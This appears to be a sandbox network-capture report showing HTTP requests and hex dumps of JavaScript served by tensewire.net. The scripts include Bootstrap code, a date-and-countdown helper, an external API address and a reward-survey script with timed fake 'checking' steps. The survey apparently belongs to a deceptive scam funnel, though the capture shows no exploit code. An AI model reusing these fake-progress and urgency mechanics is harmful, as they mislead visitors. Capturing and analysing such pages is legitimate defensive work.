                              2024-04-25 18:22:14 UTC1369INData Raw: 6c 74 28 74 2e 74 61 72 67 65 74 29 2e 69 73 28 74 68 69 73 29 29 72 65 74 75 72 6e 20 74 2e 68 61 6e 64 6c 65 4f 62 6a 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 3b 76 61 72 20 66 3d 22 61 6c 65 72 74 22 2c 63 3d 6f 2e 64 65 66 61 75 6c 74 2e 66 6e 5b 66 5d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 65 3d 74 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 63 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3b 74 26 26 28 65 3d 74 68 69 73 2e 5f 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 28 74 29 29 2c 74 68 69 73 2e 5f 74 72 69 67 67
                              Data Ascii: lt(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}};var f="alert",c=o.default.fn[f],h=function(){function t(t){this._element=t}var e=t.prototype;return e.close=function(t){var e=this._element;t&&(e=this._getRootElement(t)),this._trigg
                              2024-04-25 18:22:14 UTC1369INData Raw: 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 62 73 2e 61 6c 65 72 74 2e 64 61 74 61 2d 61 70 69 22 2c 27 5b 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 61 6c 65 72 74 22 5d 27 2c 68 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 68 29 29 2c 6f 2e 64 65 66 61 75 6c 74 2e 66 6e 5b 66 5d 3d 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 6f 2e 64 65 66 61 75 6c 74 2e 66 6e 5b 66 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 68 2c 6f 2e 64 65 66 61 75 6c 74 2e 66 6e 5b 66 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 64 65 66 61 75 6c 74 2e 66 6e 5b 66 5d 3d 63 2c 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 3b 76 61 72 20 67 3d 6f 2e 64 65 66 61 75 6c 74 2e 66 6e
                              Data Ascii: document).on("click.bs.alert.data-api",'[data-dismiss="alert"]',h._handleDismiss(new h)),o.default.fn[f]=h._jQueryInterface,o.default.fn[f].Constructor=h,o.default.fn[f].noConflict=function(){return o.default.fn[f]=c,h._jQueryInterface};var g=o.default.fn
                              2024-04-25 18:22:14 UTC1369INData Raw: 22 74 6f 67 67 6c 65 22 3d 3d 3d 65 26 26 61 5b 65 5d 28 29 7d 29 29 7d 2c 6c 28 74 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 35 2e 33 22 7d 7d 5d 29 2c 74 7d 28 29 3b 6f 2e 64 65 66 61 75 6c 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 62 73 2e 62 75 74 74 6f 6e 2e 64 61 74 61 2d 61 70 69 22 2c 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 2c 6e 3d 65 3b 69 66 28 6f 2e 64 65 66 61 75 6c 74 28 65 29 2e 68 61 73 43 6c 61 73 73 28 22 62 74 6e 22 29 7c 7c 28 65 3d 6f 2e 64 65 66 61 75 6c 74 28 65 29 2e 63 6c 6f 73 65 73 74 28 22 2e
                              Data Ascii: "toggle"===e&&a[e]()}))},l(t,null,[{key:"VERSION",get:function(){return"4.5.3"}}]),t}();o.default(document).on("click.bs.button.data-api",'[data-toggle^="button"]',(function(t){var e=t.target,n=e;if(o.default(e).hasClass("btn")||(e=o.default(e).closest(".
                              2024-04-25 18:22:14 UTC1369INData Raw: 3d 6d 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 6f 2e 64 65 66 61 75 6c 74 2e 66 6e 2e 62 75 74 74 6f 6e 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 6d 2c 6f 2e 64 65 66 61 75 6c 74 2e 66 6e 2e 62 75 74 74 6f 6e 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 64 65 66 61 75 6c 74 2e 66 6e 2e 62 75 74 74 6f 6e 3d 67 2c 6d 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 3b 76 61 72 20 70 3d 22 63 61 72 6f 75 73 65 6c 22 2c 5f 3d 22 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 76 3d 6f 2e 64 65 66 61 75 6c 74 2e 66 6e 5b 70 5d 2c 62 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 6b 65 79 62 6f 61 72 64 3a 21 30 2c 73 6c 69 64 65 3a 21 31 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 77 72 61 70 3a 21 30
                              Data Ascii: =m._jQueryInterface,o.default.fn.button.Constructor=m,o.default.fn.button.noConflict=function(){return o.default.fn.button=g,m._jQueryInterface};var p="carousel",_=".bs.carousel",v=o.default.fn[p],b={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0
                              2024-04-25 18:22:14 UTC1369INData Raw: 65 28 21 30 29 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 7d 2c 65 2e 63 79 63 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69
                              Data Ascii: e(!0)),clearInterval(this._interval),this._interval=null},e.cycle=function(t){t||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibili
                              2024-04-25 18:22:14 UTC1369INData Raw: 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 6f 2e 64 65 66 61 75 6c 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 22 6d 6f 75 73 65 65 6e 74 65 72 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 70 61 75 73 65 28 65 29 7d 29 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 79 63 6c 65 28 65 29 7d 29 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 74 6f 75 63 68 26 26 74 68 69 73 2e 5f 61 64 64 54 6f 75 63 68 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 2c 65 2e 5f 61 64 64 54 6f 75 63 68 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d
                              Data Ascii: over"===this._config.pause&&o.default(this._element).on("mouseenter.bs.carousel",(function(e){return t.pause(e)})).on("mouseleave.bs.carousel",(function(e){return t.cycle(e)})),this._config.touch&&this._addTouchEventListeners()},e._addTouchEventListeners=
                              2024-04-25 18:22:14 UTC1369INData Raw: 65 6e 74 2e 74 6f 75 63 68 65 73 2e 6c 65 6e 67 74 68 3e 31 3f 74 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 30 3a 74 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 63 6c 69 65 6e 74 58 2d 74 2e 74 6f 75 63 68 53 74 61 72 74 58 7d 28 65 29 7d 29 29 2c 6f 2e 64 65 66 61 75 6c 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 22 74 6f 75 63 68 65 6e 64 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 28 74 29 7d 29 29 29 7d 7d 2c 65 2e 5f 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65
                              Data Ascii: ent.touches.length>1?t.touchDeltaX=0:t.touchDeltaX=e.originalEvent.touches[0].clientX-t.touchStartX}(e)})),o.default(this._element).on("touchend.bs.carousel",(function(t){return n(t)})))}},e._keydown=function(t){if(!/input|textarea/i.test(t.target.tagName


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.449761104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:14 UTC652OUTGET /assets/js/functions.js?v=454576b4f6c63244067eabf05b8f71b6 HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:14 UTC830INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:14 GMT
                              Content-Type: application/javascript
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Thu, 02 May 2024 18:22:14 GMT
                              last-modified: Tue, 02 Apr 2024 17:14:32 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: MISS
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gCfaK8B0AzMtIMQVkFf3OKSn29aVfABqZYP9%2BggxU3WPfXyN7TMUCMPcYdg6XJP2CPL%2F0z8DBhWUA4PxxQF4I89pV%2B4FR3aUDGYIKctcCy7msHupdhqm09GJKalI4%2BPM"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b7cda61450d-ATL
                              2024-04-25 18:22:14 UTC539INData Raw: 37 32 63 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 61 74 65 68 61 78 28 29 20 7b 0a 20 20 76 61 72 20 6d 79 64 61 74 65 20 3d 20 6e 65 77 20 44 61 74 65 28 29 0a 20 20 6d 79 64 61 74 65 2e 73 65 74 44 61 74 65 28 6d 79 64 61 74 65 2e 67 65 74 44 61 74 65 28 29 29 3b 0a 20 20 76 61 72 20 79 65 61 72 20 3d 20 6d 79 64 61 74 65 2e 67 65 74 59 65 61 72 28 29 0a 20 20 69 66 20 28 79 65 61 72 20 3c 20 31 30 30 30 29 0a 20 20 20 20 20 20 79 65 61 72 20 2b 3d 20 31 39 30 30 0a 20 20 76 61 72 20 64 61 79 20 3d 20 6d 79 64 61 74 65 2e 67 65 74 44 61 79 28 29 0a 20 20 76 61 72 20 6d 6f 6e 74 68 20 3d 20 6d 79 64 61 74 65 2e 67 65 74 4d 6f 6e 74 68 28 29 0a 20 20 76 61 72 20 64 61 79 6d 20 3d 20 6d 79 64 61 74 65 2e 67 65 74 44 61 74 65 28 29 0a 20 20 69 66 20 28 64 61 79
                              Data Ascii: 72cfunction datehax() { var mydate = new Date() mydate.setDate(mydate.getDate()); var year = mydate.getYear() if (year < 1000) year += 1900 var day = mydate.getDay() var month = mydate.getMonth() var daym = mydate.getDate() if (day
                              2024-04-25 18:22:14 UTC1304INData Raw: 72 22 29 0a 20 20 72 65 74 75 72 6e 20 22 22 20 2b 20 6d 6f 6e 74 68 61 72 72 61 79 5b 6d 6f 6e 74 68 5d 20 2b 20 22 20 22 20 2b 20 64 61 79 6d 20 2b 20 22 2c 20 22 20 2b 20 79 65 61 72 20 2b 20 22 22 3b 0a 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 54 69 6d 65 72 28 64 75 72 61 74 69 6f 6e 29 20 7b 0a 20 20 76 61 72 20 74 69 6d 65 72 20 3d 20 64 75 72 61 74 69 6f 6e 2c 20 6d 69 6e 75 74 65 73 2c 20 73 65 63 6f 6e 64 73 3b 0a 20 20 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 6d 69 6e 75 74 65 73 20 3d 20 70 61 72 73 65 49 6e 74 28 74 69 6d 65 72 20 2f 20 36 30 2c 20 31 30 29 3b 0a 20 20 20 20 73 65 63 6f 6e 64 73 20 3d 20 70 61 72 73 65 49 6e 74 28 74 69 6d 65 72 20 25 20 36 30 2c 20 31 30 29 3b 0a 0a
                              Data Ascii: r") return "" + montharray[month] + " " + daym + ", " + year + "";}function startTimer(duration) { var timer = duration, minutes, seconds; setInterval(function() { minutes = parseInt(timer / 60, 10); seconds = parseInt(timer % 60, 10);
                              2024-04-25 18:22:14 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.449762104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:14 UTC618OUTGET /assets/js/gbvar.js?v=60 HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:14 UTC840INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:14 GMT
                              Content-Type: application/javascript
                              Content-Length: 41
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 19:31:38 GMT
                              last-modified: Wed, 21 Feb 2024 21:29:05 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 168636
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6ruXfpuf%2BYRNbY%2BVAI0lt8gYjvdFoRoEUQSeRKVviiU79QOU6Byrk7m1%2FYcEJm2v3swPh6BHyRf3HN8zmjs93w0MDJzIiSmwgwQkEUBUhJhY3Ohdwd08op%2B6l0vE8Dn"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b7cdb328bbb-ATL
                              2024-04-25 18:22:14 UTC41INData Raw: 63 6f 6e 73 74 20 41 50 49 5f 55 52 4c 20 3d 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 73 6f 6e 72 6f 61 64 2e 63 6f 6d 22 3b
                              Data Ascii: const API_URL = "https://unisonroad.com";


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.449760104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:14 UTC657OUTGET /assets/js/intl_functions.js?v=454576b4f6c63244067eabf05b8f71b6 HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:14 UTC826INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:14 GMT
                              Content-Type: application/javascript
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Thu, 02 May 2024 18:22:14 GMT
                              last-modified: Wed, 20 Dec 2023 19:19:33 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: MISS
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMrQMDPcMEZYsZVz3HTCoFtd%2FNDv5Po466K7Mik5lRChCs3DBxxMpxQZueyjRX5ZUBL4ELXHHtBsXZbOywke6UijoxMTs7dwbH4Lb4mTNfpc%2B2onTNBrKzdZqW7KfGjU"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b7cda8444f7-ATL
                              2024-04-25 18:22:14 UTC543INData Raw: 31 66 64 33 0d 0a 6c 65 74 20 6f 5f 73 75 72 76 65 79 20 3d 20 6e 75 6c 6c 3b 0a 6c 65 74 20 73 5f 73 74 65 70 20 3d 20 30 3b 0a 6c 65 74 20 6c 61 73 74 51 75 65 73 74 69 6f 6e 20 3d 20 22 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 49 4e 54 53 75 72 76 65 79 28 73 74 29 7b 0a 09 69 66 20 28 74 79 70 65 6f 66 20 74 65 6d 70 6c 61 74 65 5f 6e 61 6d 65 20 21 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 65 6d 70 6c 61 74 65 5f 6e 61 6d 65 20 3d 3d 3d 20 27 62 6c 61 6e 6b 73 27 29 20 7b 0a 09 09 24 28 27 23 63 6f 6e 66 69 72 6d 5f 70 6f 70 6d 65 73 73 61 67 65 27 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 27 6f 6e 63 6c 69 63 6b 27 29 3b 0a 09 09 24 28 27 2e 64 69 73 2d 65 64 2d 31 27 29 2e 68 69 64 65 28 29 3b 0a 09 09 24 28 27 23 70 6f 70 2d 6d
                              Data Ascii: 1fd3let o_survey = null;let s_step = 0;let lastQuestion = "";function startINTSurvey(st){if (typeof template_name != 'undefined' && template_name === 'blanks') {$('#confirm_popmessage').removeAttr('onclick');$('.dis-ed-1').hide();$('#pop-m
                              2024-04-25 18:22:14 UTC1369INData Raw: 0a 09 09 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 24 28 27 23 6c 6f 61 64 2d 74 72 61 63 6b 2d 63 6f 6e 2d 65 64 2d 31 20 2e 6c 6f 61 64 69 6e 67 2d 6c 69 73 74 2e 65 64 2d 31 20 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 31 29 20 69 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 66 61 2d 73 70 69 6e 6e 65 72 20 66 61 2d 73 70 69 6e 27 29 2e 61 64 64 43 6c 61 73 73 28 27 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 27 29 3b 0a 09 09 09 24 28 27 23 6c 6f 61 64 2d 74 72 61 63 6b 2d 63 6f 6e 2d 65 64 2d 31 20 2e 6c 6f 61 64 69 6e 67 2d 6c 69 73 74 2e 65 64 2d 31 20 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 31 29 27 29 2e 61 64 64 43 6c 61 73 73 28 27 63 68 65 63 6b 65 64 27 29 3b 0a 09 09 7d 2c 20 32 30 30 30 29 2c 0a 09
                              Data Ascii: setTimeout(function () {$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-child(1) i').removeClass('fa-spinner fa-spin').addClass('fa-check-circle');$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-child(1)').addClass('checked');}, 2000),
                              2024-04-25 18:22:14 UTC1369INData Raw: 27 75 6e 64 65 66 69 6e 65 64 27 20 7c 7c 20 74 65 6d 70 6c 61 74 65 5f 6e 61 6d 65 3d 3d 3d 27 67 65 6e 65 76 61 27 29 20 7b 0a 09 09 09 09 6f 5f 73 75 72 76 65 79 20 3d 20 72 2e 64 61 74 61 3b 0a 09 09 09 09 73 74 61 72 74 51 75 65 73 74 69 6f 6e 28 29 3b 0a 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 2f 2f 44 65 74 65 63 74 69 6e 67 20 46 72 61 6e 6b 66 75 72 74 0a 09 09 09 09 6f 5f 73 75 72 76 65 79 20 3d 20 72 2e 64 61 74 61 3b 0a 09 09 09 09 69 66 20 28 74 65 6d 70 6c 61 74 65 5f 6e 61 6d 65 20 3d 3d 20 22 66 72 61 6e 6b 66 75 72 74 22 29 20 7b 0a 09 09 09 09 09 24 28 22 2e 72 65 77 61 72 64 2d 77 72 61 70 22 29 2e 68 69 64 65 28 29 3b 0a 09 09 09 09 09 24 28 22 2e 71 75 65 73 74 69 6f 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2e 68 69 64 65 28
                              Data Ascii: 'undefined' || template_name==='geneva') {o_survey = r.data;startQuestion();} else {//Detecting Frankfurto_survey = r.data;if (template_name == "frankfurt") {$(".reward-wrap").hide();$(".questions-container").hide(
                              2024-04-25 18:22:14 UTC1369INData Raw: 20 7b 20 2f 2f 20 63 61 6c 6c 65 64 20 6f 6e 20 65 76 65 72 79 20 73 74 65 70 0a 09 09 09 2f 2f 20 55 70 64 61 74 65 20 74 68 65 20 65 6c 65 6d 65 6e 74 27 73 20 74 65 78 74 20 77 69 74 68 20 72 6f 75 6e 64 65 64 2d 75 70 20 76 61 6c 75 65 3a 0a 09 09 09 24 28 27 2e 70 62 2d 70 65 72 63 65 6e 74 27 29 2e 74 65 78 74 28 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 73 6f 6d 65 56 61 6c 75 65 29 29 3b 0a 09 09 7d 0a 09 7d 29 3b 0a 09 24 28 27 2e 73 70 72 6f 67 72 65 73 73 2c 20 2e 70 62 5f 71 2c 20 2e 70 72 6f 67 72 65 73 73 2d 62 61 72 2e 64 75 62 2c 20 2e 70 72 6f 67 72 65 73 73 2d 62 61 72 5f 73 74 72 69 70 27 29 2e 63 73 73 28 27 77 69 64 74 68 27 2c 70 72 6f 67 72 65 73 73 2b 27 25 27 29 3b 0a 09 24 28 22 2e 72 65 77 61 72 64 2d 77 72 61 70 22 29 2e
                              Data Ascii: { // called on every step// Update the element's text with rounded-up value:$('.pb-percent').text(Math.round(this.someValue));}});$('.sprogress, .pb_q, .progress-bar.dub, .progress-bar_strip').css('width',progress+'%');$(".reward-wrap").
                              2024-04-25 18:22:14 UTC1369INData Raw: 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 27 2e 70 61 63 6b 2d 69 6e 66 6f 2d 62 6f 64 79 2e 65 64 2d 31 20 2e 71 75 65 73 74 69 6f 6e 27 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 69 66 28 73 5f 73 74 65 70 3d 3d 32 29 7b 0a 09 09 09 09 09 09 09 24 28 27 3c 64 69 76 20 69 64 3d 22 69 6d 67 5f 64 22 20 20 63 6c 61 73 73 3d 22 6d 74 2d 33 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 5f 71 22 20 73 72 63 3d 22 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 77 68 65 72 65 5f 69 63 6f 6e 2e 70 6e 67 22 3e 3c 2f 64 69 76 3e 27 29 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 27 2e 70 61 63 6b 2d 69 6e 66 6f 2d 62 6f 64 79 2e 65 64 2d 31 20 2e 71 75 65 73 74 69 6f 6e 27 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 69 66 28 73 5f 73 74 65 70 3d
                              Data Ascii: .insertBefore('.pack-info-body.ed-1 .question');}if(s_step==2){$('<div id="img_d" class="mt-3"><img class="image_q" src="assets/images/where_icon.png"></div>').insertBefore('.pack-info-body.ed-1 .question');}if(s_step=
                              2024-04-25 18:22:14 UTC1369INData Raw: 22 2b 71 75 65 73 74 69 6f 6e 74 78 2b 22 20 22 2b 73 5f 73 74 65 70 2b 22 20 22 2b 6f 66 2b 22 20 22 2b 73 74 65 70 73 54 6f 74 61 6c 2b 22 3a 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 70 20 63 6c 61 73 73 3d 27 71 75 65 73 74 69 6f 6e 20 6d 74 2d 32 27 3e 22 2b 71 73 2e 6e 61 6d 65 29 3b 0a 09 09 7d 0a 09 09 2f 2f 62 61 72 63 65 6c 6f 6e 61 2c 61 70 72 69 6c 69 61 20 65 6e 64 0a 09 09 69 66 20 28 74 79 70 65 6f 66 20 74 65 6d 70 6c 61 74 65 5f 6e 61 6d 65 20 21 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 65 6d 70 6c 61 74 65 5f 6e 61 6d 65 20 3d 3d 3d 20 27 62 6c 61 6e 6b 73 27 29 20 7b 0a 09 09 7d 65 6c 73 65 7b 0a 09 09 09 24 2e 65 61 63 68 28 71 73 2e 61 6e 73 77 65 72 73 2c 20 66 75 6e 63 74 69 6f 6e 28 6b 2c 76 29 7b 0a 09 09 09
                              Data Ascii: "+questiontx+" "+s_step+" "+of+" "+stepsTotal+":</strong></span><p class='question mt-2'>"+qs.name);}//barcelona,aprilia endif (typeof template_name != 'undefined' && template_name === 'blanks') {}else{$.each(qs.answers, function(k,v){
